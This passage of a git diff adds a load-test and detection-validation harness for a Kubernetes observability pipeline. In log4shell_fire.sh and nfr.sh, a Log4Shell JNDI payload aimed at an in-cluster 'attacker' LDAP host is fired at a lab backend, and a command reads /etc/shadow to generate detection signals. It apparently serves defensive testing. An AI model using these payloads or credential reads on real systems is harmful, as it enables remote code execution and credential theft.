ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# log4shell_fire.sh — generate the bob log4j-chain log4shell DETECTION SIGNAL reliably, +# with clean restart. (Anthropic Cyber Verification context: this is detection-signal +# generation for validating the kubescape→DX→AE chain, not offensive use.) +# +# Addresses bob#140 (the log4shell signal is STATEFUL/unreliable on a re-fired/restarted +# backend — JVM negative-DNS cache + first-eval timing). Reliability is achieved BY +# CONSTRUCTION: each attempt uses a fresh-JVM backend + the WORKING resolvable FQDN, then +# VERIFIES the actual LDAP egress (backend → attacker:1389 in forensic_db.conn_stats) and +# RETRIES until confirmed — the "validity gate". It never assumes the signal was generated. +# +# Hard-won facts baked in (see memory log4j-network-detection-chain / bob#140): +# - WORKING JNDI host = attacker..svc.cluster.local (RESOLVABLE Service FQDN). +# A bare/partial name (e.g. attacker-ns.svc) NXDOMAINs → DNS event dropped → nothing fires. +# - attacker (LDAP server) MUST be up BEFORE backend (#140 attacker-before-backend). +# - delete the backend pod (not just rollout) → fresh JVM → clears the negative-DNS cache. +# +# Run NODE-SIDE on the rig (kubectl reaches the cluster directly). Idempotent. +# Env knobs: NS, ANS, RESTART(=1), MAXTRIES(=5), FIRES(=15). +set -uo pipefail +NS=${NS:-log4j-poc} +ANS=${ANS:-attacker-ns} +JNDI_HOST=${JNDI_HOST:-attacker.$ANS.svc.cluster.local} +JNDI='${jndi:ldap://'"$JNDI_HOST"':1389/Payload}' +RESTART=${RESTART:-1} +MAXTRIES=${MAXTRIES:-5} +FIRES=${FIRES:-15} +CHPOD=${CHPOD:-chi-forensic-soc-db-soc-cluster-0-0-0} +chq(){ kubectl -n clickhouse exec "$CHPOD" -c clickhouse -- clickhouse-client -q "$1" 2>/dev/null; } +ldap_count(){ chq "SELECT count() FROM forensic_db.conn_stats WHERE remote_port=1389 AND time_ > now()-INTERVAL 5 MINUTE"; } + +# 0. Attacker/LDAP server up FIRST (#140). +kubectl -n "$ANS" rollout status deploy/attacker --timeout=60s >/dev/null 2>&1 \ + || { echo "FATAL: attacker (LDAP :1389) not ready — bring it up before backend"; exit 1; } +echo "attacker ready (LDAP :1389) — #140 attacker-before-backend satisfied; JNDI host=$JNDI_HOST" + +for try in $(seq 1 "$MAXTRIES"); do + if [ "$RESTART" = 1 ]; then + echo "[try $try] delete backend pod → fresh JVM (clears negative-DNS cache)" + kubectl -n "$NS" delete pod -l app=backend --wait=true >/dev/null 2>&1 + kubectl -n "$NS" rollout status deploy/backend --timeout=120s >/dev/null 2>&1 + sleep 12 # app listening + Pixie re-attach + fi + BIP=$(kubectl -n "$NS" get svc backend -o jsonpath='{.spec.clusterIP}' 2>/dev/null) + BPORT=$(kubectl -n "$NS" get svc backend -o jsonpath='{.spec.ports[0].port}' 2>/dev/null) + before=$(ldap_count) + echo "[try $try] fire JNDI at backend $BIP:$BPORT (x$FIRES)" + for _ in $(seq 1 "$FIRES"); do + kubectl -n "$ANS" exec deploy/attacker -- curl -s -m5 -A "$JNDI" "http://$BIP:$BPORT/api/products" >/dev/null 2>&1 || true + sleep 0.5 + done + sleep 40 # settle: LDAP egress lands in conn_stats + after=$(ldap_count) + echo "[try $try] backend->:1389 LDAP egress (last5m): before=${before:-?} after=${after:-?}" + if [ "${after:-0}" -gt "${before:-0}" ]; then + echo "SIGNAL CONFIRMED — backend->:1389 LDAP egress generated on try $try (host=$JNDI_HOST)." + echo "Downstream now has signal: R0005 (DNS) + ldap-egress for DX log4shell-rce-exfil detection." + exit 0 + fi + echo "[try $try] NOT fired (literal \${jndi} in backend log = log4j didn't expand) — retrying with fresh JVM" + RESTART=1 +done +echo "FAILED to confirm LDAP egress after $MAXTRIES tries." +echo "Check: backend app log shows 'ua=\${jndi:...}' LITERAL (not expanded) ⇒ log4j lookups not evaluating;" +echo "verify backend is the *-vulnerable image + log4j evaluates message lookups (bob#140 validity gate)." +exit 2 diff --git a/src/e2e_test/adaptive_export_loadtest/harness/nfr.sh b/src/e2e_test/adaptive_export_loadtest/harness/nfr.sh new file mode 100755 index 00000000000..130ae8ec599 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/harness/nfr.sh @@ -0,0 +1,67 @@ +#!/usr/bin/env bash + +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# nfr.sh — AE non-functional benchmark: throughput, AE+dx mem under load, and +# END-TO-END no-data-loss proof (broker read_count == AE wrote_count == ACTUAL CH rows). +# Two phases: passthrough (firehose, throughput stress) then streaming (DX). Node-side on rig. +set -uo pipefail +NS=log4j-poc; CHPOD=chi-forensic-soc-db-soc-cluster-0-0-0 +DUR=${DUR:-150} +OUT=/tmp/nfr.txt; : > "$OUT" +chq(){ kubectl -n clickhouse exec "$CHPOD" -c clickhouse -- clickhouse-client -q "$1" 2>/dev/null; } +say(){ echo "[$(date -u +%H:%M:%S)] $*" | tee -a "$OUT"; } +BIP=$(kubectl -n $NS get svc backend -o jsonpath='{.spec.clusterIP}'); BPORT=$(kubectl -n $NS get svc backend -o jsonpath='{.spec.ports[0].port}') +fire(){ kubectl -n attacker-ns exec deploy/attacker -- curl -s -m4 -A '${jndi:ldap://attacker.attacker-ns.svc.cluster.local:1389/Payload}' "http://$BIP:$BPORT/api/products" >/dev/null 2>&1 || true + local BP; BP=$(kubectl -n $NS get pods --no-headers 2>/dev/null|awk '/^backend/{print $1;exit}') + [ -n "$BP" ] && kubectl -n $NS exec "$BP" -- sh -c 'whoami; cat /etc/shadow 2>/dev/null|head -1; getent hosts attacker.attacker-ns.svc.cluster.local >/dev/null 2>&1' >/dev/null 2>&1 || true; } +memsum(){ kubectl -n "$1" top pod -l "$2" --no-headers 2>/dev/null | awk '{gsub(/Mi/,"",$3); s+=$3} END{print s+0}'; } +truncate_all(){ local t; for t in http_events dns_events conn_stats pgsql_events ae_reconcile adaptive_attribution kubescape_logs; do chq "TRUNCATE TABLE IF EXISTS forensic_db.\`$t\`" >/dev/null 2>&1; done; } +setarm(){ kubectl -n pl set env ds/adaptive-export "$@" ADAPTIVE_RECONCILE=true >/dev/null 2>&1; kubectl -n pl rollout status ds/adaptive-export --timeout=150s >/dev/null 2>&1; } + +run_phase(){ local name=$1; shift + say "=== PHASE $name : $* ===" + setarm "$@"; truncate_all; say " truncated; $name load window ${DUR}s" + local t0 aemax=0 dxmax=0 pemmax=0 sm=0 + t0=$(date +%s) + while [ $(( $(date +%s) - t0 )) -lt "$DUR" ]; do + fire + local ae dx pem; ae=$(memsum pl 'name=adaptive-export'); dx=$(memsum honey 'app=dx-daemon'); pem=$(memsum pl 'name=vizier-pem') + [ "${ae:-0}" -gt "$aemax" ] && aemax=$ae; [ "${dx:-0}" -gt "$dxmax" ] && dxmax=$dx; [ "${pem:-0}" -gt "$pemmax" ] && pemmax=$pem + sm=$((sm+1)); sleep 12 + done + local el; el=$(( $(date +%s) - t0 )); say " window done ${el}s ($sm samples); flush 20s"; sleep 20 + say " [MEM peak] AE(2pods)=${aemax}Mi dx-daemon=${dxmax}Mi PEM=${pemmax}Mi" + say " [NO-LOSS PROOF] broker_read == AE_wrote == CH_actual_rows:" + local t rd wr ch + for t in http_events dns_events conn_stats; do + rd=$(chq "SELECT sum(read_count) FROM forensic_db.ae_reconcile WHERE table_name='$t'"); rd=${rd:-0} + wr=$(chq "SELECT sum(wrote_count) FROM forensic_db.ae_reconcile WHERE table_name='$t'"); wr=${wr:-0} + ch=$(chq "SELECT count() FROM forensic_db.$t"); ch=${ch:-0} + say " $t: read=$rd wrote=$wr CH_rows=$ch $([ "$wr" = "$ch" ] && echo 'MATCH' || echo '*MISMATCH*')$([ "$rd" = "$wr" ] && echo '/read==wrote' || echo '/READ!=WROTE')" + done + say " [BYTES] per-table rows + compressed bytes (on-disk data volume):" + chq "SELECT ' '||table, sum(rows), sum(data_compressed_bytes) FROM system.parts WHERE database='forensic_db' AND active AND table IN ('http_events','dns_events','conn_stats') GROUP BY table ORDER BY table FORMAT TSV" | tee -a "$OUT" + local tot; tot=$(chq "SELECT count() FROM forensic_db.http_events"); tot=$((tot + $(chq "SELECT count() FROM forensic_db.dns_events") + $(chq "SELECT count() FROM forensic_db.conn_stats"))) + say " [THROUGHPUT] $name CH rows=$tot over ${el}s = $(awk -v r=$tot -v e=$el 'BEGIN{printf "%.1f", r/e}') rows/s" + say " [steered] $(chq "SELECT arrayStringConcat(groupArray(pod),',') FROM (SELECT DISTINCT pod FROM forensic_db.adaptive_attribution WHERE t_end>now())")" +} + +say "##### AE NFR BENCHMARK START #####" +run_phase ALL-passthrough ADAPTIVE_PASSTHROUGH=true ADAPTIVE_WRITE_MODE= ADAPTIVE_PUSH_PIXIE_ROWS=false ADAPTIVE_PASSTHROUGH_WINDOW_SEC=60 ADAPTIVE_PASSTHROUGH_REFRESH_SEC=60 +run_phase DX-streaming ADAPTIVE_PASSTHROUGH=false ADAPTIVE_WRITE_MODE=streaming ADAPTIVE_PUSH_PIXIE_ROWS=false ADAPTIVE_STREAM_WINDOW_SEC=60 ADAPTIVE_STREAM_REFRESH_SEC=60 +say "##### NFR DONE #####" diff --git a/src/e2e_test/adaptive_export_loadtest/harness/run.sh b/src/e2e_test/adaptive_export_loadtest/harness/run.sh new file mode 100755 index 00000000000..f8403e4fdbb --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/harness/run.sh @@ -0,0 +1,57 @@ +#!/usr/bin/env bash + +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# run.sh — drive the full AE fixture-isolation suite on a live rig and produce +# the reproducibility evidence (per-experiment CSV + stats verdicts). +# +# Prereqs: +# KUBECONFIG = tailscale-direct kubeconfig (make kubeconfig PG=) +# AELOAD_IMAGE = ttl.sh/aeload-:24h (built on the PG dev-machine) +# AE in single-shot load-test mode (this script runs ae_config.sh). +# +# Usage: KUBECONFIG=... AELOAD_IMAGE=... EVID=/path ./run.sh +set -uo pipefail +HERE="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"; source "$HERE/lib.sh" + +[[ -n "${AELOAD_IMAGE:-}" ]] || die "AELOAD_IMAGE not set" +EVID="${EVID:-/home/croedig/biz/PoC/log4j/evidence/datavolume/aeload_$(date -u +%Y%m%dT%H%M%SZ)}" +mkdir -p "$EVID" +REPS_CTRL="${REPS_CTRL:-100}" +REPS_E5="${REPS_E5:-100}" +REPS_E6="${REPS_E6:-10}" +log "evidence dir: $EVID" + +# 1) AE into single-shot load-test mode (idempotent). +bash "$HERE/ae_config.sh" + +# 2) Control-plane experiments (no Pixie/gen needed). +for e in E1 E2 E3 E4; do + log "=== control $e (reps=$REPS_CTRL) ===" + EXP="$e" REPS="$REPS_CTRL" OUT="$EVID/${e}.csv" bash "$HERE/exp_control.sh" +done +log "=== control E6 idempotency (reps=$REPS_E6) ===" +EXP=E6 REPS="$REPS_E6" OUT="$EVID/E6.csv" bash "$HERE/exp_control.sh" + +# 3) Data-plane experiment (real Pixie capture of the counted band). +log "=== data-plane E5 (reps=$REPS_E5) ===" +REPS="$REPS_E5" OUT="$EVID/E5.csv" bash "$HERE/exp_e5.sh" + +# 4) Aggregate verdicts. +log "=== aggregate ===" +python3 "$HERE/stats.py" "$EVID"/*.csv | tee "$EVID/VERDICT.txt" +log "DONE -> $EVID" diff --git a/src/e2e_test/adaptive_export_loadtest/harness/stats.py b/src/e2e_test/adaptive_export_loadtest/harness/stats.py new file mode 100755 index 00000000000..a9b4a6fa59a --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/harness/stats.py @@ -0,0 +1,89 @@ +#!/usr/bin/env python3 + +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +"""stats.py — reduce an experiment CSV to a per-metric reproducibility report. + +Exact reproducibility ⇔ every measured (`*_act`) metric has a single distinct +value across all PASS reps (std = 0 / CV = 0). Prints per-metric +n/distinct/mean/std/CV%/min/max and an overall verdict. No fabrication: it only +summarizes the rows the harness actually recorded. + +Usage: stats.py [ ...] +""" +import csv +import statistics as st +import sys + + +def num(x): + try: + return float(x) + except (TypeError, ValueError): + return None + + +def report(path): + with open(path) as f: + rows = list(csv.DictReader(f)) + if not rows: + print(f"== {path}: empty ==") + return + cols = list(rows[0].keys()) + passcol = "pass" if "pass" in cols else None + npass = sum(1 for r in rows if passcol and str(r[passcol]).startswith("PASS")) + print(f"== {path} == reps={len(rows)} PASS={npass}/{len(rows)}") + + # Reproducibility metrics = the COUNT columns AE wrote (must be constant + # across reps). wm_act is EXCLUDED: it equals each rep's distinct event_time + # by design (monotone), validated per-rep as wm_act==wm_exp via the pass flag + # — it is not expected to be constant across reps. + metrics = [c for c in cols if c.endswith("_act") and c != "wm_act"] + metrics = list(dict.fromkeys(metrics)) # dedupe, keep order + repro_ok = True + for c in metrics: + vals = [num(r[c]) for r in rows if (not passcol or str(r[passcol]).startswith("PASS"))] + vals = [v for v in vals if v is not None] + if not vals: + print(f" {c:16s} (no numeric PASS values)") + continue + distinct = sorted(set(vals)) + mean = st.fmean(vals) + sd = st.pstdev(vals) if len(vals) > 1 else 0.0 + cv = (sd / mean * 100) if mean else 0.0 + flag = "EXACT" if len(distinct) == 1 else f"VARIES({len(distinct)})" + if len(distinct) != 1: + repro_ok = False + print(f" {c:16s} n={len(vals):4d} distinct={len(distinct):3d} " + f"mean={mean:.3f} std={sd:.3f} cv={cv:.4f}% " + f"min={min(vals):.0f} max={max(vals):.0f} {flag}") + verdict = ("EXACTLY REPRODUCIBLE (all metrics std=0)" if repro_ok + else "NOT exactly reproducible (see VARIES above)") + print(f" VERDICT: {verdict}") + print() + + +def main(): + if len(sys.argv) < 2: + print(__doc__) + sys.exit(2) + for p in sys.argv[1:]: + report(p) + + +if __name__ == "__main__": + main() diff --git a/src/e2e_test/adaptive_export_loadtest/k8s/00-sinks.yaml b/src/e2e_test/adaptive_export_loadtest/k8s/00-sinks.yaml new file mode 100644 index 00000000000..7aca396ff60 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/k8s/00-sinks.yaml @@ -0,0 +1,82 @@ +--- +# Shared, long-lived data-plane sinks for the AE load-tests. These are the PEER +# side of cleanloadgen's traffic; AE filters to the client (gen) pod so the +# sinks' own rows are excluded — but they carry NO probes/sidecars regardless so +# the namespace stays free of uncounted traffic. +# +# IMAGE is substituted by the harness (ttl.sh/aeload-:24h, built on the PG +# dev-machine). pg-sink uses the public postgres image. +apiVersion: v1 +kind: Namespace +metadata: + name: aeload + labels: + app.kubernetes.io/part-of: ae-loadtest +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: http-sink + namespace: aeload +spec: + replicas: 1 + selector: + matchLabels: {app: http-sink} + template: + metadata: + labels: {app: http-sink} + spec: + # No probes anywhere: probe traffic would be captured by Pixie. + containers: + - name: httpsink + image: __IMAGE__ + command: ["/usr/local/bin/httpsink"] + env: + - {name: LISTEN_ADDR, value: ":8080"} + ports: + - containerPort: 8080 +--- +apiVersion: v1 +kind: Service +metadata: + name: http-sink + namespace: aeload +spec: + selector: {app: http-sink} + ports: + - port: 8080 + targetPort: 8080 +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: pg-sink + namespace: aeload +spec: + replicas: 1 + selector: + matchLabels: {app: pg-sink} + template: + metadata: + labels: {app: pg-sink} + spec: + containers: + - name: postgres + image: postgres:16-alpine + # trust auth keeps the gen simple; no probes. + env: + - {name: POSTGRES_PASSWORD, value: postgres} + - {name: POSTGRES_HOST_AUTH_METHOD, value: trust} + ports: + - containerPort: 5432 +--- +apiVersion: v1 +kind: Service +metadata: + name: pg-sink + namespace: aeload +spec: + selector: {app: pg-sink} + ports: + - port: 5432 + targetPort: 5432 diff --git a/src/e2e_test/adaptive_export_loadtest/k8s/gen-pod.tmpl.yaml b/src/e2e_test/adaptive_export_loadtest/k8s/gen-pod.tmpl.yaml new file mode 100644 index 00000000000..6c02ee557c1 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/k8s/gen-pod.tmpl.yaml @@ -0,0 +1,38 @@ +--- +# Per-rep generator pod. The harness renders one of these per repetition with a +# UNIQUE name (gen--) — that uniqueness is the data-plane isolation: +# AE's df.pod filter pulls only this rep's traffic even if windows overlap. +# +# Substituted by the harness: __NAME__, __IMAGE__, __HTTP_ADDR__ (sink ClusterIP +# :8080 as a literal IP so it adds no DNS), __PG_ADDR__, __HTTP_N__, __DNS_N__, +# __PGSQL_N__. The pod FIRES once then HOLDS (sleeps on SIGTERM) so its upid +# stays resolvable while AE queries the window; the harness deletes it after the +# rep is measured. +apiVersion: v1 +kind: Pod +metadata: + name: __NAME__ + namespace: aeload + labels: + app: aeload-gen +spec: + restartPolicy: Never + containers: + - name: gen + image: __IMAGE__ + command: ["/usr/local/bin/cleanloadgen"] + env: + - {name: HTTP_ADDR, value: "__HTTP_ADDR__"} + - {name: HTTP_PATH, value: "/ping"} + - {name: HTTP_N, value: "__HTTP_N__"} + - {name: DNS_N, value: "__DNS_N__"} + - {name: DNS_BASE, value: "t-%d.aeload.svc.cluster.local."} + - {name: PG_ADDR, value: "__PG_ADDR__"} + - {name: PGSQL_N, value: "__PGSQL_N__"} + - {name: PG_USER, value: "postgres"} + - {name: PG_PASSWORD, value: "postgres"} + - {name: SETTLE_PRE_MS, value: "__SETTLE_PRE_MS__"} + - {name: SUSTAIN_SEC, value: "__SUSTAIN_SEC__"} + - {name: POD_NAME, valueFrom: {fieldRef: {fieldPath: metadata.name}}} + - {name: POD_NAMESPACE, valueFrom: {fieldRef: {fieldPath: metadata.namespace}}} + - {name: NODE_NAME, valueFrom: {fieldRef: {fieldPath: spec.nodeName}}} diff --git a/src/e2e_test/adaptive_export_loadtest/tools/loadgen/Dockerfile b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/Dockerfile new file mode 100644 index 00000000000..fd186588a19 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/Dockerfile @@ -0,0 +1,18 @@ +# Build both load-test binaries (cleanloadgen + httpsink) into one small image. +# Built on the PG dev-machine (native amd64 docker), never on the agent VM +# (ARM, no bazel/heavy-build) — same path used for the dx images. +FROM golang:1.22-bookworm AS build +WORKDIR /src +# -mod=mod lets the build resolve + record go.sum for the single lib/pq dep +# without a pre-committed go.sum (keeps the tool tree minimal). +ENV GOFLAGS=-mod=mod CGO_ENABLED=0 +COPY go.mod ./ +COPY cmd ./cmd +RUN go build -trimpath -ldflags="-s -w" -o /out/cleanloadgen ./cmd/cleanloadgen +RUN go build -trimpath -ldflags="-s -w" -o /out/httpsink ./cmd/httpsink + +FROM gcr.io/distroless/static-debian12:nonroot +COPY --from=build /out/cleanloadgen /usr/local/bin/cleanloadgen +COPY --from=build /out/httpsink /usr/local/bin/httpsink +# Default to the sink; the generator pod overrides command to cleanloadgen. +ENTRYPOINT ["/usr/local/bin/httpsink"] diff --git a/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/cleanloadgen/main.go b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/cleanloadgen/main.go new file mode 100644 index 00000000000..4c506eb4a31 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/cleanloadgen/main.go @@ -0,0 +1,255 @@ +// cleanloadgen — a deterministic, "clean-cut" traffic generator for the +// adaptive_export (AE) live data-plane load-tests. +// +// It is the OPPOSITE of a fuzzer: its only job is to emit an EXACTLY known +// number of HTTP, DNS and PostgreSQL operations against fixed sinks, inside a +// single sealed time band [B0,B1], and emit nothing else over the network. The +// counts it prints are the ground-truth oracle the AE assertions compare +// forensic_db row deltas against — no fabricated numbers anywhere. +// +// Determinism rules baked in (see the load-test design notes): +// - HTTP: one NEW TCP connection per request (DisableKeepAlives) so both +// http_events AND conn_stats counts are a function of HTTP_N. Every request +// MUST return 2xx or the process exits non-zero (the rep is discarded, not +// silently mis-counted). +// - DNS: exactly ONE A-query per name via LookupNetIP(ip4) on a FQDN with a +// trailing dot (suppresses /etc/resolv.conf search-domain expansion under +// ndots:5) → dns_events == DNS_N. Names need not resolve; an NXDOMAIN is +// still one captured query/response, so NXDOMAIN is not treated as failure. +// - PGSQL: a single connection runs PGSQL_N separate `SELECT 1` statements → +// pgsql_events == PGSQL_N. +// - HTTP/PG endpoints are passed as IP:port (HTTP_ADDR / PG_ADDR), never DNS +// names, so resolving the sinks themselves cannot pollute the DNS count. +// +// After firing, the process prints a one-line JSON manifest, emits the sentinel +// AELOAD_FIRED, then HOLDS (sleeps until SIGTERM). Holding keeps the pod — and +// therefore its upid — alive so Pixie's upid_to_pod_name can still resolve it +// when AE queries the window AFTER the kubescape fixture is injected. The +// harness deletes the pod once the rep is measured. +package main + +import ( + "context" + "database/sql" + "encoding/json" + "errors" + "fmt" + "io" + "net" + "net/http" + "os" + "os/signal" + "strconv" + "strings" + "syscall" + "time" + + _ "github.com/lib/pq" +) + +type manifest struct { + HTTP int `json:"http"` // http_events expected + DNS int `json:"dns"` // dns_events expected (A queries) + PGSQL int `json:"pgsql"` // pgsql_events expected + ConnTCPEst int `json:"conn_tcp_est"` // conn_stats TCP rows expected (tolerance gate) + B0 int64 `json:"b0"` // band start, unix nanos (node clock == Pixie time_) + B1 int64 `json:"b1"` // band end, unix nanos + B0ISO string `json:"b0_iso"` + B1ISO string `json:"b1_iso"` + Pod string `json:"pod"` + Namespace string `json:"namespace"` + Node string `json:"node"` +} + +func envInt(k string, def int) int { + if v := os.Getenv(k); v != "" { + if n, err := strconv.Atoi(v); err == nil { + return n + } + fatalf("env %s=%q is not an integer", k, v) + } + return def +} + +func envStr(k, def string) string { + if v := os.Getenv(k); v != "" { + return v + } + return def +} + +func fatalf(format string, a ...any) { + fmt.Fprintf(os.Stderr, "cleanloadgen: "+format+"\n", a...) + os.Exit(1) +} + +func mustIPPort(k string) string { + v := os.Getenv(k) + if v == "" { + fatalf("%s is required (IP:port, never a DNS name — see design)", k) + } + host, _, err := net.SplitHostPort(v) + if err != nil { + fatalf("%s=%q is not host:port: %v", k, v, err) + } + if net.ParseIP(host) == nil { + fatalf("%s host %q must be a literal IP, not a name, so it cannot add DNS events", k, host) + } + return v +} + +func main() { + var ( + httpN = envInt("HTTP_N", 100) + dnsN = envInt("DNS_N", 100) + pgN = envInt("PGSQL_N", 100) + httpAddr = mustIPPort("HTTP_ADDR") // e.g. 10.43.0.10:8080 + httpPath = envStr("HTTP_PATH", "/ping") + dnsBase = envStr("DNS_BASE", "t-%d.aeload.svc.cluster.local.") // trailing dot = FQDN + settlePre = time.Duration(envInt("SETTLE_PRE_MS", 1500)) * time.Millisecond + ) + // PG is optional (PGSQL_N may be 0 or PG_ADDR unset). + pgAddr := os.Getenv("PG_ADDR") + if pgN > 0 { + pgAddr = mustIPPort("PG_ADDR") + } + + // Let the pod's networking settle and the upid register before the band + // opens, so no stray startup traffic lands inside [B0,B1]. + time.Sleep(settlePre) + + b0 := time.Now() + + // ---- HTTP: HTTP_N requests, new connection each ---- + for i := 0; i < httpN; i++ { + // Fresh transport per request guarantees a new TCP connection. + tr := &http.Transport{DisableKeepAlives: true} + cl := &http.Client{Transport: tr, Timeout: 5 * time.Second} + url := "http://" + httpAddr + httpPath + resp, err := cl.Get(url) + if err != nil { + fatalf("http request %d/%d to %s failed: %v", i+1, httpN, url, err) + } + _, _ = io.Copy(io.Discard, resp.Body) + resp.Body.Close() + if resp.StatusCode/100 != 2 { + fatalf("http request %d/%d to %s: status %d (need 2xx)", i+1, httpN, url, resp.StatusCode) + } + tr.CloseIdleConnections() + } + + // ---- DNS: DNS_N distinct names, exactly one A query each ---- + res := &net.Resolver{PreferGo: true} + for i := 0; i < dnsN; i++ { + name := fmt.Sprintf(dnsBase, i) + if !strings.HasSuffix(name, ".") { + fatalf("DNS_BASE must yield an FQDN ending in '.' to suppress search expansion; got %q", name) + } + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + // ip4 → a single A query. NXDOMAIN is fine: the query/response is still + // one captured dns_event. Any OTHER error (timeout) means the query may + // not have completed deterministically → fail the rep. + _, err := res.LookupNetIP(ctx, "ip4", name) + cancel() + if err != nil && !isNXDomain(err) { + fatalf("dns lookup %d/%d for %s failed non-NXDOMAIN: %v", i+1, dnsN, name, err) + } + } + + // ---- PGSQL: PGSQL_N statements over one connection ---- + if pgN > 0 { + host, port, _ := net.SplitHostPort(pgAddr) + dsn := fmt.Sprintf("host=%s port=%s user=%s password=%s dbname=%s sslmode=disable connect_timeout=5", + host, port, + envStr("PG_USER", "postgres"), envStr("PG_PASSWORD", "postgres"), envStr("PG_DB", "postgres")) + db, err := sql.Open("postgres", dsn) + if err != nil { + fatalf("pg open: %v", err) + } + db.SetMaxOpenConns(1) + db.SetMaxIdleConns(1) + for i := 0; i < pgN; i++ { + var one int + if err := db.QueryRow("SELECT 1").Scan(&one); err != nil { + fatalf("pg query %d/%d failed: %v", i+1, pgN, err) + } + } + db.Close() + } + + b1 := time.Now() + + m := manifest{ + HTTP: httpN, + DNS: dnsN, + PGSQL: pgN, + ConnTCPEst: httpN + boolToInt(pgN > 0), // HTTP_N new conns + 1 pg conn + B0: b0.UnixNano(), + B1: b1.UnixNano(), + B0ISO: b0.UTC().Format(time.RFC3339Nano), + B1ISO: b1.UTC().Format(time.RFC3339Nano), + Pod: envStr("POD_NAME", os.Getenv("HOSTNAME")), + Namespace: envStr("POD_NAMESPACE", "aeload"), + Node: envStr("NODE_NAME", ""), + } + out, _ := json.Marshal(m) + fmt.Printf("AELOAD_MANIFEST %s\n", out) + fmt.Println("AELOAD_FIRED") + + sig := make(chan os.Signal, 1) + signal.Notify(sig, syscall.SIGTERM, syscall.SIGINT) + + // SUSTAIN: after the exact counted band, optionally keep a low continuous + // HTTP trickle for SUSTAIN_SEC. A FRESH pod's traffic is often missed because + // Pixie/Stirling's eBPF attaches to the new process only after a scan cycle — + // so a one-shot band fires before capture begins (the "0 for freshly-flagged + // pods" symptom). A trickle keeps the pod observable for the whole window, so + // Pixie captures it once attached. Used by the sustained / "does AE keep + // writing until t_end" RCA (E8-data). For exact-count tests (E5) leave + // SUSTAIN_SEC=0 and instead pre-warm via SETTLE_PRE_MS so Stirling is already + // attached when the exact band fires. + if sustainSec := envInt("SUSTAIN_SEC", 0); sustainSec > 0 { + deadline := time.Now().Add(time.Duration(sustainSec) * time.Second) + ticker := time.NewTicker(time.Second) + defer ticker.Stop() + // Trickle DISTINCT DNS lookups (one A-query each) — a protocol Pixie + // reliably traces — so every AE re-pull pass sees NEW rows and we can + // observe the C15 "keep writing until t_end" contract. (HTTP trickle was + // invisible on rigs where Pixie isn't tracing HTTP.) + sres := &net.Resolver{PreferGo: true} + si := dnsN + for time.Now().Before(deadline) { + select { + case <-sig: + return + case <-ticker.C: + sctx, scancel := context.WithTimeout(context.Background(), 3*time.Second) + _, _ = sres.LookupNetIP(sctx, "ip4", fmt.Sprintf(dnsBase, si)) + scancel() + si++ + } + } + } + + // HOLD: keep the pod (and its upid) alive so Pixie metadata still resolves + // upid_to_pod_name when AE queries the window. Harness deletes us when done. + <-sig +} + +func boolToInt(b bool) int { + if b { + return 1 + } + return 0 +} + +// isNXDomain reports whether err is a "no such host" DNS error (the expected, +// fully-deterministic outcome for synthetic names) rather than a transport +// failure that would make the query count non-deterministic. +func isNXDomain(err error) bool { + var de *net.DNSError + if errors.As(err, &de) { + return de.IsNotFound + } + return false +} diff --git a/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/httpsink/main.go b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/httpsink/main.go new file mode 100644 index 00000000000..efe076af467 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/cmd/httpsink/main.go @@ -0,0 +1,30 @@ +// httpsink — a minimal HTTP server for the AE load-test data plane. +// +// It exists only to terminate cleanloadgen's counted HTTP requests with a 200 +// and zero side effects. No logging, no metrics endpoint, no readiness/liveness +// surface — anything extra would be captured by Pixie and pollute the per-pod +// http_events / conn_stats counts on the sink side. (AE filters to the client +// pod, so the sink's rows are excluded anyway, but keeping it silent removes any +// chance of cross-talk.) +package main + +import ( + "net/http" + "os" +) + +func main() { + addr := ":8080" + if v := os.Getenv("LISTEN_ADDR"); v != "" { + addr = v + } + mux := http.NewServeMux() + mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) { + w.WriteHeader(http.StatusOK) + _, _ = w.Write([]byte("ok\n")) + }) + srv := &http.Server{Addr: addr, Handler: mux} + if err := srv.ListenAndServe(); err != nil { + panic(err) + } +} diff --git 